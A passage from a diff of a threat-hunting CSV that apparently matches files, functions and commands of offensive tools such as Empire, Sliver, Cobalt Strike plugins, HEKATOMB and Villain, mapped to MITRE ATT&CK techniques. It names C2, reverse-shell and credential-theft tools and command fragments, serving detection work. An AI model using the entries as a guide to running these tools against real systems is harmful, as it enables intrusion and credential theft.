Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*ProcessSuperPuTTYFile*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Process-TaskingPackets*","offensive_tool_keyword","empire","empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1059","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*ProcessThoroughLocal*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*ProcessThoroughRemote*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Processus-Thief/HEKATOMB*","offensive_tool_keyword","HEKATOMB","Hekatomb is a python script that connects to LDAP directory to retrieve all computers and users informations. Then it will download all DPAPI blob of all users from all computers and uses Domain backup keys to decrypt them","T1087.002 - T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","AD Enumeration","https://github.com/Processus-Thief/HEKATOMB","1","1","N/A","N/A","4","372","40","2023-02-08T16:00:47Z","2022-09-09T15:07:15Z" -"*ProcessWinSCPLocal*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. 
While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*ProcessWinSCPLocal*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*produkey.zip*","offensive_tool_keyword","produkey","ProduKey is a small utility that displays the ProductID and the CD-Key of Microsoft Office (Microsoft Office 2003. Microsoft Office 2007). Windows (Including Windows 8/7/Vista). Exchange Server. and SQL Server installed on your computer. You can view this information for your current running operating system. or for another operating system/computer - by using command-line options. This utility can be useful if you lost the product key of your Windows/Office. 
and you want to reinstall it on your computer.","T1003.001 - T1003.002 - T1012 - T1057 - T1518","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/product_cd_key_viewer.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*produkey_setup.exe*","offensive_tool_keyword","produkey","ProduKey is a small utility that displays the ProductID and the CD-Key of Microsoft Office (Microsoft Office 2003. Microsoft Office 2007). Windows (Including Windows 8/7/Vista). Exchange Server. and SQL Server installed on your computer. You can view this information for your current running operating system. or for another operating system/computer - by using command-line options. This utility can be useful if you lost the product key of your Windows/Office. and you want to reinstall it on your computer.","T1003.001 - T1003.002 - T1012 - T1057 - T1518","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/product_cd_key_viewer.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*produkey-x64.zip*","offensive_tool_keyword","produkey","ProduKey is a small utility that displays the ProductID and the CD-Key of Microsoft Office (Microsoft Office 2003. Microsoft Office 2007). Windows (Including Windows 8/7/Vista). Exchange Server. and SQL Server installed on your computer. You can view this information for your current running operating system. or for another operating system/computer - by using command-line options. This utility can be useful if you lost the product key of your Windows/Office. 
and you want to reinstall it on your computer.","T1003.001 - T1003.002 - T1012 - T1057 - T1518","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/product_cd_key_viewer.html","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*profiles generate --save *","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" -"*profiles new beacon *","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" -"*profiles new --mtls *","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6596","920","2023-10-03T20:36:09Z","2019-01-17T22:07:38Z" +"*profiles generate --save *","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 
- T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*profiles new beacon *","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*profiles new --mtls *","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" "*ProgIDsUACBypass.*","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - 
TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","10","10","1356","214","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z" "*program/replay.pl*","offensive_tool_keyword","nikto","Nikto web server scanner","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/sullo/nikto","1","1","N/A","N/A","10","7136","1096","2023-09-18T14:44:28Z","2012-11-24T04:24:29Z" -"*projectdiscovery/interactsh*","offensive_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C12","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","1","FP risk - legitimate service abused by attackers - move to admintools ?","10","10","2675","317","2023-10-02T08:20:04Z","2021-01-29T14:31:51Z" -"*prosody2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8293","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*projectdiscovery/interactsh*","offensive_tool_keyword","interactsh","Interactsh is an open-source tool for detecting out-of-band interactions. 
It is a tool designed to detect vulnerabilities that cause external interactions but abused by attackers as C12","T1566.002 - T1566.001 - T1071 - T1102","TA0011 - TA0001","N/A","N/A","C2","https://github.com/projectdiscovery/interactsh","1","1","FP risk - legitimate service abused by attackers - move to admintools ?","10","10","2677","317","2023-10-02T08:20:04Z","2021-01-29T14:31:51Z" +"*prosody2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" "*prowler gcp --credentials-file path*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*Proxmark*","offensive_tool_keyword","Proxmark","The proxmark3 is a powerful general purpose RFID tool. the size of a deck of cards. designed to snoop. 
listen and emulate everything from Low Frequency (125kHz) to High Frequency (13.56MHz) tags.","T1210 - T1561 - T1336 - T1335","TA0002 - TA0011 - TA0009","N/A","N/A","Network Exploitation tools","https://github.com/Proxmark/proxmark3","1","1","N/A","N/A","10","2872","891","2021-03-30T06:59:59Z","2014-03-16T23:36:31Z" "*proxmark3 -p /dev/ttyACM0*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*Proxy bypass enabled for Neo4j connection*","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","0","N/A","10","4","330","38","2023-09-01T06:41:34Z","2022-09-07T13:34:30Z" +"*Proxy bypass enabled for Neo4j connection*","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","0","N/A","10","4","330","38","2023-10-04T14:40:59Z","2022-09-07T13:34:30Z" "*Proxy Shellcode Handler*","offensive_tool_keyword","cobaltstrike","Project to enumerate proxy configurations and generate shellcode from CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - 
T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/AggressiveProxy","1","0","N/A","10","10","139","26","2020-11-04T16:08:11Z","2020-11-04T12:53:00Z" "*proxy.py --dns * --dns_port * --clients*","offensive_tool_keyword","ThunderDNS","This tool can forward TCP traffic over DNS protocol","T1095 - T1071.004","TA0011 - TA0003","N/A","N/A","C2","https://github.com/fbkcs/ThunderDNS","1","0","N/A","10","10","405","60","2019-12-24T12:41:17Z","2018-12-04T15:18:47Z" -"*proxy_bypass.py*","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","1","N/A","10","4","330","38","2023-09-01T06:41:34Z","2022-09-07T13:34:30Z" -"*proxy_cmd_for_exec_by_sibling*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. 
utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3252","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" -"*proxy_linux_amd64*","offensive_tool_keyword","Modlishka ","Modlishka is a powerful and flexible HTTP reverse proxy. It implements an entirely new and interesting approach of handling browser-based HTTP traffic flow. which allows to transparently proxy multi-domain destination traffic. both TLS and non-TLS. over a single domain. without a requirement of installing any additional certificate on the client.","T1090.001 - T1071.001 - T1556.001 - T1204.001 - T1568.002","TA0011 - TA0001 - TA0002 - TA0005 - TA0040","N/A","N/A","Network Exploitation Tools","https://github.com/drk1wi/Modlishka","1","1","N/A","5","10","4434","854","2023-04-10T07:30:13Z","2018-12-19T15:59:54Z" +"*proxy_bypass.py*","offensive_tool_keyword","autobloody","Tool to automatically exploit Active Directory privilege escalation paths shown by BloodHound","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/autobloody","1","1","N/A","10","4","330","38","2023-10-04T14:40:59Z","2022-09-07T13:34:30Z" +"*proxy_cmd_for_exec_by_sibling*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. 
utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*proxy_linux_amd64*","offensive_tool_keyword","Modlishka ","Modlishka is a powerful and flexible HTTP reverse proxy. It implements an entirely new and interesting approach of handling browser-based HTTP traffic flow. which allows to transparently proxy multi-domain destination traffic. both TLS and non-TLS. over a single domain. without a requirement of installing any additional certificate on the client.","T1090.001 - T1071.001 - T1556.001 - T1204.001 - T1568.002","TA0011 - TA0001 - TA0002 - TA0005 - TA0040","N/A","N/A","Network Exploitation Tools","https://github.com/drk1wi/Modlishka","1","1","N/A","5","10","4435","854","2023-04-10T07:30:13Z","2018-12-19T15:59:54Z" "*proxychains -*","offensive_tool_keyword","proxychains","proxychains - a tool that forces any TCP connection made by any given application to follow through proxy like TOR or any other SOCKS4 SOCKS5 or HTTP(S) proxy","T1090.004 - T1090.003 - T1027","TA0001 - TA0006 - TA0040","N/A","N/A","Exploitation tools","https://github.com/haad/proxychains","1","0","N/A","N/A","10","5489","586","2023-04-05T10:32:16Z","2011-02-25T12:27:05Z" "*proxychains atexec.py*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*proxychains dcomexec.py*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with 
hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" 
@@ -15255,44 +15423,44 @@ "*proxyshellcodeurl*","offensive_tool_keyword","cobaltstrike","Project to enumerate proxy configurations and generate shellcode from CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/AggressiveProxy","1","1","N/A","10","10","139","26","2020-11-04T16:08:11Z","2020-11-04T12:53:00Z" "*proxyshell-enumerate.py*","offensive_tool_keyword","Earth Lusca Operations Tools ","Earth Lusca Operations Tools and commands","T1203 - T1218 - T1027 - T1064 - T1029 - T1210 - T1090","TA0007 - TA0008","N/A","N/A","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/dmaasland/proxyshell-poc","1","1","N/A","N/A","","N/A","","","" "*proxyshell-poc*","offensive_tool_keyword","Earth Lusca Operations Tools ","Earth Lusca Operations Tools and commands","T1203 - T1218 - T1027 - T1064 - T1029 - 